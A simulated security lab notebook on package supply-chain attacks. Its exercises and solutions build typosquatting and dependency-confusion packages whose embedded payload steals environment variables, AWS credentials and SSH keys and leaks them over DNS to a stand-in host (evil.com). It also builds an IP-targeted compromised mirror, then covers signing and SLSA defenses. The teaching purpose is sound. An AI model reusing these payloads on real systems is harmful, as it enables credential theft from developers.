# Lab 3: Software Distribution Security

In this lab, you'll learn about supply chain attacks targeting package distribution systems. You'll:
1. Create typosquatting packages to exploit naming confusion
2. Implement dependency confusion attacks
3. Build package security controls like signing & transparency

We'll use a simulated package repository system to safely demonstrate these concepts.

## Setup

First, let's set up our classes and helper functions:

In [None]:
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from datetime import datetime
import hashlib
import json
import hmac

@dataclass
class Package:
    """A software package as stored in the simulated repositories.

    Plain record type: it carries the package's identity, payload and declared
    dependencies and performs no validation of its own.
    """
    name: str  # distribution name, e.g. "requests"
    version: str  # version string, e.g. "2.28.1"
    content: bytes  # raw package payload
    author: str  # publisher name recorded on the package
    dependencies: Dict[str, str]  # dependency name -> version constraint
    
@dataclass
class SignedPackage(Package):
    """A Package extended with optional signature metadata.

    Both extra fields default to None, so an instance can exist before a
    signature has been attached.
    """
    signature: Optional[bytes] = None  # raw signature bytes, or None if unsigned
    signing_key_id: Optional[str] = None  # identifier of the key that produced the signature

@dataclass
class BuildEnvironment:
    """Snapshot of a build worker's environment."""
    env_vars: Dict[str, str]  # environment variable name -> value
    installed_packages: Set[str]  # names of the packages present on the worker

@dataclass
class Repository:
    """A simulated package repository together with its trusted publishers."""
    name: str  # repository label, e.g. "public-pypi"
    packages: Dict[str, Dict[str, Package]]  # package name -> version -> Package
    trusted_publishers: Set[str]  # publisher names this repository trusts
    
@dataclass
class TransparencyLog:
    """In-memory stand-in for a package transparency log.

    Entries are held in a plain list; nothing in this class enforces
    append-only behaviour or tamper evidence.
    """
    entries: List[Dict[str, str]]  # one metadata dict per logged package
    
# Fixtures shared by the exercises below.

# Public index holding one legitimate package.
public_repo = Repository(
    name="public-pypi",
    packages={
        "requests": {
            "2.28.1": Package(
                name="requests",
                version="2.28.1",
                content=b"legitimate requests code",
                author="kennethreitz",
                dependencies={"urllib3": ">=1.21.1"},
            )
        }
    },
    trusted_publishers={"kennethreitz", "psf"}
)

# Company-internal index; "internal-lib" exists only here.
private_repo = Repository(
    name="company-pypi",
    packages={
        "internal-lib": {
            "1.0.0": Package(
                name="internal-lib",
                version="1.0.0", 
                content=b"company internal code",
                author="company-dev",
                dependencies={},
            )
        }
    },
    trusted_publishers={"company-dev"}
)

# Build worker environment fixture.
test_build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/local/bin:/usr/bin", "PYTHONPATH": "/usr/local/lib"},
    installed_packages={"pip", "build-essential", "python3"}
)

### Exercise 1: Typosquatting Attack

Package typosquatting is when attackers upload malicious packages with names similar to popular packages,
hoping developers will accidentally install them through typos. For example:
- requests -> reqeusts
- urllib3 -> urllib_3
- python-jwt -> python_jwt

Your first task is to implement a function that creates a typosquatting package designed to
steal sensitive data when installed. The package should:
1. Have a name similar to a target package
2. Include legitimate-looking metadata 
3. Hide malicious code in the package content
4. Match the target's dependency structure

Tips:
- Common typos include character swaps, missing letters, and similar-looking characters
- Package metadata should closely match the target to look legitimate
- Malicious code often masquerades as legitimate functionality

TODO: This exercise is still fairly simplistic; consider making it more realistic in a future revision.

In [None]:
def create_typosquatting_package(
    target_pkg: Package,
    exfil_url: str
) -> Package:
    """
    Build the lab's simulated typosquatting package for a legitimate target.

    The exercise works purely on the in-memory Package record used by the
    simulated repository.

    Args:
        target_pkg: The legitimate package whose name and metadata are imitated
        exfil_url: Collection URL that the test cell expects to find embedded
            in the returned package content

    Returns:
        Package whose name is similar to, but different from, target_pkg.name
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
target = public_repo.packages["requests"]["2.28.1"]
exfil_url = "https://evil.com/collect"
malicious = create_typosquatting_package(target, exfil_url)

# The name must differ from the target while introducing at most two
# characters that the target name does not contain. This is a loose check,
# so also inspect the name manually to see whether it looks plausible.
assert malicious.name != target.name
assert len(set(malicious.name) - set(target.name)) <= 2

# Version and dependencies must mirror the target exactly
assert malicious.version == target.version
assert malicious.dependencies == target.dependencies

# The content must be decodable text containing the expected markers
code = malicious.content.decode()
assert "import" in code and "socket" in code
assert exfil_url in code
assert "try:" in code and "except:" in code  # Payload is expected to swallow its own errors
print("Typosquatting package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_typosquatting_package(target_pkg: Package, exfil_url: str) -> Package:
    """Reference solution: build the simulated typosquatting Package.

    Lab material only. The result is an in-memory Package record; the
    content is stored as bytes and is never executed by this function.

    Args:
        target_pkg: Legitimate package whose version and dependencies are copied
        exfil_url: String interpolated into the generated content

    Returns:
        Package with a derived name, the target's version and dependencies,
        and the author "security-utilities"
    """
    # Derive the look-alike name by doubling every 'e'
    # (e.g. "requests" -> "reequeests").
    # NOTE(review): when the target name contains no 'e' the replace is a
    # no-op and the name comes back unchanged, which fails the test cell's
    # `malicious.name != target.name` assertion.
    name = target_pkg.name.replace('e', 'e' if 'e' not in target_pkg.name else 'ee')
    
    # Generated module text. Doubled braces ({{ }}) are f-string escapes that
    # become single braces in the output; only {target_pkg.name} and
    # {exfil_url} are interpolated here.
    content = f'''
import {target_pkg.name} as real_pkg  # Use legitimate package

# Malicious code hidden in legitimate-looking function
def setup_session(*args, **kwargs):
    try:
        import socket, os, json
        # Collect sensitive data
        data = {{"env": dict(os.environ)}}
        # Exfiltrate via DNS to avoid firewalls
        socket.gethostbyname(f"{{json.dumps(data)}}.{exfil_url}")
    except:
        pass  # Hide any errors
    return real_pkg.setup_session(*args, **kwargs)

# Export legitimate package interface
from {target_pkg.name} import *
'''.encode()

    return Package(
        name=name,
        version=target_pkg.version,  # Match target version
        content=content,
        author="security-utilities",  # Legitimate-looking author
        dependencies=target_pkg.dependencies  # Same dict object as the target's, not a copy
    )
```
</details>

### Exercise 2: Dependency Confusion Attack

Dependency confusion attacks exploit the way package managers resolve dependencies across multiple sources.
When a package exists in both public and private repositories, package managers may incorrectly choose
the public version, even for internal packages.

Your task is to implement a dependency confusion attack that:
1. Identifies internal package names from public artifacts
2. Creates malicious packages with matching names
3. Uses higher version numbers to trigger installation
4. Exfiltrates data when installed

Tips:
- Look for internal package imports and requirements
- Use very high version numbers to override private versions
- Consider how to identify valuable data to exfiltrate

In [None]:
def create_confusion_package(
    target_pkg: Package,
    repo: Repository,
    exfil_url: str
) -> Package:
    """
    Build the lab's simulated dependency-confusion package.

    The exercise works purely on the in-memory Package record used by the
    simulated repositories.

    Args:
        target_pkg: Internal package whose name and dependencies are reused
        repo: Repository that contains target_pkg
        exfil_url: Collection endpoint referenced by the package content

    Returns:
        Package with the same name as target_pkg and a higher version
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
internal_pkg = private_repo.packages["internal-lib"]["1.0.0"]
malicious = create_confusion_package(internal_pkg, private_repo, "evil.com")


def _version_key(version: str) -> tuple:
    """Turn a dotted numeric version such as "1.10.0" into a comparable tuple.

    Raises ValueError if any dot-separated part is not an integer.
    """
    return tuple(int(part) for part in version.split("."))


# Should have same name but higher version.
# Versions are compared numerically: plain string comparison is
# lexicographic and would rank "10.0.0" below "9.0.0".
assert malicious.name == internal_pkg.name
assert _version_key(malicious.version) > _version_key(internal_pkg.version)

# Should identify as internal package
assert "internal" in malicious.author.lower()
assert malicious.dependencies == internal_pkg.dependencies

# Should include exfiltration code
code = malicious.content.decode()
assert "import" in code
assert "os.environ" in code or "ssh" in code or "aws" in code
assert "socket" in code or "requests" in code or "http" in code

print("Dependency confusion package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_confusion_package(target_pkg: Package, repo: Repository, exfil_url: str) -> Package:
    """Reference solution: build the simulated dependency-confusion Package.

    Lab material only. The result is an in-memory Package record; the
    content is stored as bytes and is never executed by this function.

    Args:
        target_pkg: Internal package whose name and dependencies are reused
        repo: Repository containing the target; only repo.name is read, to
            build the author label
        exfil_url: String interpolated into the generated content

    Returns:
        Package named like target_pkg with the fixed version "999.999.999"
    """
    # Use much higher version to override internal package
    version = "999.999.999"
    
    # Generated module text. Doubled braces ({{ }}) are f-string escapes that
    # become single braces in the output; only {exfil_url} and
    # {target_pkg.name} are interpolated here.
    content = f'''
# Internal package replacement
import os, socket, json, subprocess

def collect_secrets():
    secrets = {{}}
    
    # Collect environment variables
    secrets["env"] = dict(os.environ)
    
    # Look for AWS credentials
    try:
        aws_dir = os.path.expanduser("~/.aws")
        if os.path.exists(aws_dir):
            secrets["aws"] = open(os.path.join(aws_dir, "credentials")).read()
    except:
        pass
        
    # Look for SSH keys
    try:
        ssh_dir = os.path.expanduser("~/.ssh")
        if os.path.exists(ssh_dir):
            secrets["ssh"] = open(os.path.join(ssh_dir, "id_rsa")).read()
    except:
        pass
        
    return secrets

# Exfiltrate data
try:
    secrets = collect_secrets()
    socket.gethostbyname(f"{{json.dumps(secrets)}}.{exfil_url}")
except:
    pass

# Provide expected package interface
from {target_pkg.name} import *
'''.encode()

    return Package(
        name=target_pkg.name,
        version=version,
        content=content,
        # The test cell only requires "internal" to appear in the lowercased author
        author=f"Internal-{repo.name}-Maintainer",
        dependencies=target_pkg.dependencies  # Same dict object as the target's, not a copy
    )
```
</details>


### Exercise 3: Package Security Controls

Now let's implement security controls to prevent these attacks:
1. Package signing to prevent unauthorized uploads
2. Transparency logs to detect malicious packages
3. Dependency pinning to prevent confusion attacks

Your task is to implement these controls using industry best practices like:
- Code signing with key management
- Merkle tree transparency logs
- Strict version pinning
- Artifact provenance verification

In [None]:
@dataclass
class PackageSigningKey:
    """A code-signing key pair plus the identity of its owner."""
    key_id: str  # identifier recorded alongside signatures made with this key
    public_key: bytes  # public half of the key pair
    private_key: bytes  # private half of the key pair
    owner: str  # publisher name the key belongs to
    
def sign_package(
    package: Package, 
    signing_key: PackageSigningKey,
    transparency_log: TransparencyLog
) -> SignedPackage:
    """
    Sign a package and record the signing event in the transparency log.

    Args:
        package: Package to sign
        signing_key: Key to sign with; the test cell expects its key_id to be
            stored on the result as signing_key_id
        transparency_log: Log to record the package in

    Returns:
        SignedPackage with a non-None signature
    """
    # YOUR CODE HERE
    pass

def verify_package(
    package: SignedPackage,
    repository: Repository,
    transparency_log: TransparencyLog
) -> bool:
    """
    Verify a package's signature and its transparency log entry.

    Args:
        package: Package to verify
        repository: Repository whose trusted_publishers set decides which
            publishers are accepted (it holds publisher names, not keys)
        transparency_log: Log to check the package against

    Returns:
        True if package is valid, False otherwise
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
# Set up test keys
test_key = PackageSigningKey(
    key_id="test-key-2022",
    public_key=b"public",
    private_key=b"private",
    owner="kennethreitz"
)
# Make sure the key owner is a trusted publisher of the public repository
public_repo.trusted_publishers.add(test_key.owner)

# Set up transparency log
log = TransparencyLog(entries=[])

# Test signing
package = public_repo.packages["requests"]["2.28.1"]
signed = sign_package(package, test_key, log)
assert signed.signature is not None
assert signed.signing_key_id == test_key.key_id

# Verify valid package
assert verify_package(signed, public_repo, log)

# Reject untrusted publisher: the package (and its author) is unchanged,
# only the owner of the signing key is not a trusted publisher
bad_key = PackageSigningKey(
    key_id="bad-key",
    public_key=b"public",
    private_key=b"private", 
    owner="attacker"
)
bad_signed = sign_package(package, bad_key, log)
assert not verify_package(bad_signed, public_repo, log)

# Reject a package whose signature was altered after signing
signed.signature = b"modified"
assert not verify_package(signed, public_repo, log)

print("Package security controls implemented successfully!")

<details>
<summary>Solution</summary>

```python
# Stand-in for an external key store: key_id -> registered signing key.
# HMAC is symmetric, so the verifier has to use the same secret the signer
# used. A real deployment would use asymmetric signatures and publish only
# the public half of each key.
_KEY_STORE: Dict[str, "PackageSigningKey"] = {}


def _signing_message(package: Package) -> bytes:
    """Return the canonical byte string that a package signature covers."""
    return json.dumps(
        {
            "name": package.name,
            "version": package.version,
            "author": package.author,
            "dependencies": package.dependencies,
            "sha256": hashlib.sha256(package.content).hexdigest(),
        },
        sort_keys=True,  # key order must not influence the signature
    ).encode()


def sign_package(package: Package, signing_key: PackageSigningKey, transparency_log: TransparencyLog) -> SignedPackage:
    """Sign a package and record the signature in the transparency log.

    Args:
        package: Package to sign
        signing_key: Key to sign with; it is registered in the key store
            under its key_id so that verify_package can look it up
        transparency_log: Log that receives one entry for this signature

    Returns:
        A SignedPackage copy of ``package`` carrying the signature and key id
    """
    # First registration of a key_id wins, so a later key that reuses an
    # existing id cannot replace the one verification relies on.
    _KEY_STORE.setdefault(signing_key.key_id, signing_key)

    signature = hmac.new(
        signing_key.private_key, _signing_message(package), hashlib.sha256
    ).digest()

    # Add to transparency log
    transparency_log.entries.append({
        "timestamp": datetime.utcnow().isoformat(),
        "package": package.name,
        "version": package.version,
        "author": package.author,
        "key_id": signing_key.key_id,
        "signature": signature.hex()
    })

    return SignedPackage(
        name=package.name,
        version=package.version,
        content=package.content,
        author=package.author,
        dependencies=package.dependencies,
        signature=signature,
        signing_key_id=signing_key.key_id
    )


def verify_package(package: SignedPackage, repository: Repository, transparency_log: TransparencyLog) -> bool:
    """Check publisher trust, the transparency log entry and the signature.

    Args:
        package: Package to verify
        repository: Repository whose trusted_publishers decide which package
            authors and key owners are accepted
        transparency_log: Log that must contain this exact signature

    Returns:
        True only if every check passes, False otherwise
    """
    # An unsigned package can never be valid
    if package.signature is None or package.signing_key_id is None:
        return False

    # Verify publisher is trusted
    if package.author not in repository.trusted_publishers:
        return False

    # The signing key must be known and must belong to a trusted publisher;
    # otherwise anyone could sign a trusted author's package with their own key.
    signing_key = _KEY_STORE.get(package.signing_key_id)
    if signing_key is None or signing_key.owner not in repository.trusted_publishers:
        return False

    # Check transparency log: this exact signature must have been logged
    claimed_hex = package.signature.hex()
    logged = any(
        entry.get("package") == package.name
        and entry.get("version") == package.version
        and entry.get("key_id") == package.signing_key_id
        and entry.get("signature") == claimed_hex
        for entry in transparency_log.entries
    )
    if not logged:
        return False

    # Verify signature is valid for the package as it is now
    expected_sig = hmac.new(
        signing_key.private_key, _signing_message(package), hashlib.sha256
    ).digest()
    return hmac.compare_digest(package.signature, expected_sig)
```
</details>

### Exercise 4: Mirror/CDN Compromise

Package mirrors and CDNs can be compromised to serve malicious versions of legitimate packages.
A sophisticated attacker could:
1. Compromise a mirror node
2. Selectively replace package content
3. Preserve package metadata & hashes
4. Target specific users/regions

Your task is to implement a compromised mirror that serves malicious content while avoiding detection.

In [None]:
@dataclass
class MirrorNode:
    """A mirror of a package repository serving one region."""
    region: str  # region label, e.g. "us-east"
    packages: Dict[str, Dict[str, Package]]  # package name -> version -> Package
    original_hashes: Dict[str, str]  # package name -> hash
    serving_ips: Set[str]  # IP addresses associated with this mirror

def create_compromised_mirror(
    original_mirror: MirrorNode,
    target_package: str,
    target_ips: Set[str],
    malicious_content: bytes
) -> MirrorNode:
    """
    Build the lab's simulated compromised mirror.

    The exercise works purely on the in-memory MirrorNode record.

    Args:
        original_mirror: Mirror to derive the compromised copy from
        target_package: Name of the package whose content is replaced
        target_ips: Client IPs that receive the replacement content
        malicious_content: Content to serve to those clients

    Returns:
        MirrorNode that serves the original content to all other clients
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
# The mirror decides what to serve from the requesting client's address, so
# the test controls that address through this module-level hook.
_current_client_ip = "1.1.1.1"


def get_client_ip() -> str:
    """Return the address of the client currently talking to the mirror."""
    return _current_client_ip


original = MirrorNode(
    region="us-east",
    packages={"requests": {"2.28.1": public_repo.packages["requests"]["2.28.1"]}},
    original_hashes={"requests": "original-hash"},
    serving_ips={"8.8.8.8", "1.1.1.1"}
)

target_ips = {"8.8.8.8"}
malicious = b"evil package content"

compromised = create_compromised_mirror(original, "requests", target_ips, malicious)

# Should preserve original packages for non-targets
non_target_ip = "1.1.1.1"
_current_client_ip = non_target_ip
pkg = compromised.packages["requests"]["2.28.1"]
assert pkg.content == original.packages["requests"]["2.28.1"].content

# Should serve malicious content to targets
_current_client_ip = "8.8.8.8"
assert compromised.packages["requests"]["2.28.1"].content == malicious

print("Mirror compromise implemented successfully!")

<details>
<summary>Solution</summary>

```python
def create_compromised_mirror(
    original_mirror: MirrorNode,
    target_package: str,
    target_ips: Set[str],
    malicious_content: bytes
) -> MirrorNode:
    """Reference solution: build the simulated compromised MirrorNode.

    Lab material only; everything happens on in-memory records.

    Args:
        original_mirror: Mirror to derive the compromised copy from
        target_package: Name of the package whose content is replaced
        target_ips: Client IPs that receive the replacement content
        malicious_content: Content returned to those clients

    Returns:
        New MirrorNode whose entry for target_package is a dict subclass
        that picks the package to return on each lookup
    """
    # Create copy of original mirror.
    # dict.copy() is shallow: the per-package version dicts are still shared
    # with original_mirror until the target's entry is replaced below.
    compromised = MirrorNode(
        region=original_mirror.region,
        packages=original_mirror.packages.copy(),
        original_hashes=original_mirror.original_hashes.copy(),
        serving_ips=original_mirror.serving_ips.copy()
    )
    
    # Create malicious package that preserves metadata
    # NOTE(review): the version "2.28.1" is hard-coded; a target package
    # without that version raises KeyError here.
    original_pkg = compromised.packages[target_package]["2.28.1"]
    malicious_pkg = Package(
        name=original_pkg.name,
        version=original_pkg.version,
        content=malicious_content,
        author=original_pkg.author,
        dependencies=original_pkg.dependencies
    )
    
    # Override package getter to serve malicious content selectively.
    # Only __getitem__ is overridden; other dict accessors are not.
    class CompromisedDict(dict):
        def __getitem__(self, key):
            pkg = super().__getitem__(key)
            if key == "2.28.1" and pkg.name == target_package:
                # Get client IP (simplified)
                # NOTE(review): get_client_ip is not defined in this
                # function; it must exist as a global when a lookup happens,
                # otherwise this line raises NameError.
                client_ip = get_client_ip()
                if client_ip in target_ips:
                    return malicious_pkg
            return pkg
            
    compromised.packages[target_package] = CompromisedDict(
        compromised.packages[target_package]
    )
    
    return compromised
```
</details>

### Exercise 5: SLSA Provenance & Transparency

Supply-chain Levels for Software Artifacts (SLSA) provides a framework for ensuring
software artifact integrity. Key components include:
1. Provenance - cryptographically verifiable build metadata
2. Transparency - public, append-only logs of all packages
3. Build requirements - hermetic, reproducible builds

Your task is to implement SLSA level 3 provenance generation and verification.

In [None]:
@dataclass
class SLSAProvenance:
    """SLSA provenance attestation describing how a package was built."""
    build_id: str  # identifier of this particular build
    builder_id: str  # identifier of the builder that produced it
    build_type: str  # kind of build; the test cell expects "hermetic"
    source: Dict[str, str]  # source description: repo, commit, etc
    dependencies: List[Dict[str, str]]  # one dict per dependency
    build_params: Dict[str, str]  # parameters the build ran with
    timestamp: str  # when the attestation was created, as a string
    signature: Optional[bytes] = None  # signature over the attestation; None until signed

def generate_slsa_provenance(
    package: Package,
    build_env: BuildEnvironment,
    source_repo: str,
    signing_key: PackageSigningKey
) -> SLSAProvenance:
    """
    Generate a signed SLSA provenance attestation for a package.

    Args:
        package: Package to generate provenance for
        build_env: Environment the package was built in
        source_repo: Source code repository; the test cell expects it under
            the "repo" key of the attestation's source
        signing_key: Key to sign the attestation with

    Returns:
        SLSAProvenance with its signature set
    """
    # YOUR CODE HERE
    pass

def verify_slsa_provenance(
    package: Package,
    provenance: SLSAProvenance,
    transparency_log: TransparencyLog,
    trusted_builders: Set[str]
) -> bool:
    """
    Verify a SLSA provenance attestation for a package.

    Args:
        package: Package the attestation is claimed to describe
        provenance: Provenance attestation to check
        transparency_log: Log to check the build against
        trusted_builders: Set of builder IDs that are accepted

    Returns:
        True if provenance is valid, False otherwise
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/bin"},
    installed_packages={"python3"}
)

pkg = public_repo.packages["requests"]["2.28.1"]
source_repo = "github.com/psf/requests"

provenance = generate_slsa_provenance(pkg, build_env, source_repo, test_key)

# Should include required SLSA fields
assert provenance.build_id and provenance.builder_id
assert provenance.build_type == "hermetic"
assert provenance.source["repo"] == source_repo
assert len(provenance.dependencies) > 0
assert provenance.signature

# generate_slsa_provenance is not handed a transparency log, so publish the
# build record here, in a log dedicated to this exercise.
slsa_log = TransparencyLog(entries=[])
slsa_log.entries.append({
    "build_id": provenance.build_id,
    "package": pkg.name,
    "version": pkg.version,
    "builder_id": provenance.builder_id,
})

# Should verify valid provenance
trusted_builders = {provenance.builder_id}
assert verify_slsa_provenance(pkg, provenance, slsa_log, trusted_builders)

# Should reject builds that were never logged
assert not verify_slsa_provenance(
    pkg, provenance, TransparencyLog(entries=[]), trusted_builders
)

# Should reject untrusted builders
assert not verify_slsa_provenance(pkg, provenance, slsa_log, {"different-builder"})

# Should reject invalid signatures
provenance.signature = b"invalid"
assert not verify_slsa_provenance(pkg, provenance, slsa_log, trusted_builders)

print("SLSA provenance implementation successful!")

<details>
<summary>Solution</summary>

```python
# Stand-in for an external key store: builder_id -> HMAC secret.
# HMAC is symmetric, so the verifier has to use the same secret the builder
# signed with. A real deployment would use asymmetric signatures and publish
# only the builder's public key.
_BUILDER_KEYS: Dict[str, bytes] = {}


def _provenance_message(package: Package, provenance: SLSAProvenance) -> bytes:
    """Return the canonical byte string that a provenance signature covers.

    Every attestation field and the package content hash are included, so
    changing any of them invalidates the signature.
    """
    return json.dumps(
        {
            "build_id": provenance.build_id,
            "builder_id": provenance.builder_id,
            "build_type": provenance.build_type,
            "package": f"{package.name}@{package.version}",
            "sha256": hashlib.sha256(package.content).hexdigest(),
            "source": provenance.source,
            "dependencies": provenance.dependencies,
            "build_params": provenance.build_params,
            "timestamp": provenance.timestamp,
        },
        sort_keys=True,  # key order must not influence the signature
    ).encode()


def generate_slsa_provenance(
    package: Package,
    build_env: BuildEnvironment,
    source_repo: str,
    signing_key: PackageSigningKey,
    transparency_log: Optional[TransparencyLog] = None
) -> SLSAProvenance:
    """Generate a signed SLSA provenance attestation for a package.

    Args:
        package: Package to generate provenance for
        build_env: Environment the package was built in
        source_repo: Source code repository
        signing_key: Key to sign the attestation with; its secret is
            registered in the key store under the derived builder id
        transparency_log: Optional log; when given, the build is recorded
            in it so that verify_slsa_provenance can find it

    Returns:
        Signed SLSAProvenance
    """
    # One timestamp is used for both the build id and the attestation
    timestamp = datetime.utcnow().isoformat()
    build_id = hashlib.sha256(
        f"{package.name}-{package.version}-{timestamp}".encode()
    ).hexdigest()
    builder_id = f"trusted-builder-{signing_key.key_id}"

    # First registration of a builder id wins, so a later key cannot replace
    # the one verification relies on.
    _BUILDER_KEYS.setdefault(builder_id, signing_key.private_key)

    provenance = SLSAProvenance(
        build_id=build_id,
        builder_id=builder_id,
        build_type="hermetic",
        source={
            "repo": source_repo,
            "type": "git",
            "commit": "HEAD",  # In practice, use actual commit
            "tag": package.version
        },
        dependencies=[
            {"name": name, "version": ver}
            for name, ver in package.dependencies.items()
        ],
        build_params={
            "environ": json.dumps(build_env.env_vars, sort_keys=True),
            # sorted(): set iteration order is not stable between runs
            "packages": json.dumps(sorted(build_env.installed_packages))
        },
        timestamp=timestamp
    )

    # Sign provenance
    provenance.signature = hmac.new(
        signing_key.private_key,
        _provenance_message(package, provenance),
        hashlib.sha256
    ).digest()

    # Publish the build when a log was supplied
    if transparency_log is not None:
        transparency_log.entries.append({
            "timestamp": timestamp,
            "build_id": build_id,
            "package": package.name,
            "version": package.version,
            "builder_id": builder_id,
            "signature": provenance.signature.hex()
        })

    return provenance


def verify_slsa_provenance(
    package: Package,
    provenance: SLSAProvenance,
    transparency_log: TransparencyLog,
    trusted_builders: Set[str]
) -> bool:
    """Verify a SLSA provenance attestation for a package.

    Args:
        package: Package the attestation is claimed to describe
        provenance: Provenance attestation to check
        transparency_log: Log that must contain the build
        trusted_builders: Set of builder IDs that are accepted

    Returns:
        True only if every check passes, False otherwise
    """
    # Verify builder is trusted
    if provenance.builder_id not in trusted_builders:
        return False

    # Verify build type meets SLSA 3 requirements
    if provenance.build_type != "hermetic":
        return False

    # An unsigned attestation can never be valid
    if provenance.signature is None:
        return False

    # Verify transparency log entry. The log may also hold entries of other
    # kinds (e.g. package signatures) that have no "build_id", hence .get().
    logged = any(
        entry.get("build_id") == provenance.build_id
        and entry.get("package") == package.name
        for entry in transparency_log.entries
    )
    if not logged:
        return False

    # Verify signature with the secret registered for this builder
    builder_key = _BUILDER_KEYS.get(provenance.builder_id)
    if builder_key is None:
        return False
    expected_sig = hmac.new(
        builder_key, _provenance_message(package, provenance), hashlib.sha256
    ).digest()
    return hmac.compare_digest(provenance.signature, expected_sig)
```
</details>